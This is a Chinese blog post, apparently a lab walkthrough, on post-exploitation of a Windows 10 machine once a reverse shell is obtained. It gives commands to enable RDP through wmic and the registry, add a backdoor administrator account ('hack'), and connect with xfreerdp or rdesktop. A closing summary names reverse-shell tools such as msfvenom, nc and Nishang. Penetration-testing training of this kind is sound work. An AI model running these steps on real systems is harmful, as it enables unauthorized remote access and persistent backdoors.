Windows10拿到shell后远程登录

一、准备工作

kali机:192.168.19.130

win10:192.168.19.133

主机:192.168.1.73(自己操作可以在kali上,我这是因为反弹的shell在主机上)

二、开启远程登录

1.win10上关闭实时保护,并且运行了反弹shell的脚本(关于如何反弹shell下次再写一篇文章,这里主要讲拿到shell后如何远程登录)

 2.主机上进行监听拿到shell

3.查看远程登录3389端口是否打开

netstat -an

 这边发现没有打开

 4.windows打开3389远程连接的命令有两种办法(前提是自己拿到的shell是管理员权限)

(1)

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

(2)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

5.再次查看3389是否打开(对于有些系统命令端就是打开不了远程连接,那就要在设置里手动打开了)

也可用netstat -an|find "3389"查看端口是否打开,不过有时候不回显,我的就是

6.确认远程连接端口是不是3389(因为有些人会将远程连接的端口更改)

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

 0xd3d转换成十进制就是3389

 三、创建用于登录的用户(前提当前用户是管理员)

1.Windows创建用户命令

net user hack 123456 /add

2.将用户添加进管理员组命令

net localgroup administrators hack /add

3.查看用户

net user

 

四、kali远程登录

1.xfreerdp工具

/u就是用户名,/p是密码,/v是靶机(目标)的地址/size就是图形化界面的大小

xfreerdp /u:hack /p:123456 /v:192.168.19.133 /size:80%

 输入Y

然后就是连上了

2.rdesktop 工具

rdesktop 192.168.19.133

输入yes

 五、中断连接

1.查看rdesktop或xfreerdp的进程

ps aux | grep rdesktop 

 2.中断进程

kill -9 进程号

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
在Windows系统中,反弹shell是一种常见的攻击技术,用于获取对目标机器的远程访问权限。有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的木马,然后开启监听端口。目标机在命令提示符下执行生成的powershell脚本,即可实现反弹shell。需要注意的是,有时由于防火墙的原因,控制可能会不稳定。\[1\] 另一种方法是使用nc(netcat)工具进行反弹。通过nc反弹得到的shell可能不是一个完全交互的shell,某些命令可能无效。相比之下,通过Python脚本得到的shell可以实现对被控制主机的任意操作。\[2\] 此外,还有一些基于PowerShell的攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit框架、nc工具以及基于PowerShell的攻击框架。具体选择哪种方法取决于实际需求和环境。 #### 引用[.reference_title] - *1* *2* [Windows下反弹shell的方式](https://blog.csdn.net/ws1813004226/article/details/117248359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Windows下反弹shell的方法](https://blog.csdn.net/qq_39101049/article/details/96191861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值